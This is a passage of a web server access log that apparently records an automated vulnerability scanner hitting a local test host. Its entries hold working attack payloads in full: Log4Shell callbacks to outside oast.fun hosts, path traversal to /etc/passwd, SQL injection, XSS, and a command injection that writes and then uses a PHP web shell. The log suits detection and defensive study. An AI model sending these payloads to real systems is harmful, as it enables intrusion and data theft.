HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbconsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LTX_navi.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-issues.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /h2-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn __schema {\x5Cn directive\x5Cn }\x5Cn}\x22,\x22variables\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?x=${jndi:ldap://${hostName}.uri.ca285tosmpvbafqg07h0h641t13bejoar.oast.fun/a} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/smoosh-status.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"ip=127.0.0.1|echo \x22PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K\x22|base64 -d > poc.php&mac=00-00","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /guest_auth/guestIsUp.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proxy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/admin/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about_state HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"${jndi:ldap://${hostName}.useragent.ca285tosmpvbafqg07h0a1c6oqjix3ka8.oast.fun}", "http_referer":"${jndi:ldap://${hostName}.referer.ca285tosmpvbafqg07h0ibfd4f9yxwfz8.oast.fun}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://${hostName}.xforwardedfor.ca285tosmpvbafqg07h03gf77nwkanc15.oast.fun}"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /simple/pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax/telemetry.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/snyk.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s3cmd.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"password=12345","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?noptin_ns=email_click&to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cp/Shares?user=&protocol=webaccess&v=2.3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMUser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ajax/telemetry.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/awredir.pl?url=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/affwp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/configs/poc.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"{\x0D\x0A \x22name\x22:\x22spring.datasource.hikari.connection-test-query\x22,\x0D\x0A \x22value\x22:\x22CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/env HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"loginUsername=admin&loginPassword=axis2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"{\x0D\x0A \x22application_type\x22: \x22web\x22,\x0D\x0A \x22redirect_uris\x22: [\x22https://ca285tosmpvbafqg07h0pr53hgh4js4wm.oast.fun/callback\x22],\x0D\x0A \x22client_name\x22: \x22127.0.0.1\x22,\x0D\x0A \x22logo_uri\x22: \x22https://ca285tosmpvbafqg07h0349kwoyajfd4s.oast.fun/favicon.ico\x22,\x0D\x0A \x22subject_type\x22: \x22pairwise\x22,\x0D\x0A \x22token_endpoint_auth_method\x22: \x22client_secret_basic\x22,\x0D\x0A \x22request_uris\x22: [\x22https://ca285tosmpvbafqg07h0jjs4ng6h8qzkk.oast.fun\x22]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /connect/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"username=admin&password=gophish&csrf_token={{replace(url_encode(html_unescape(csrf_token)), \x22+\x22, \x22%2B\x22)}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\x22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa 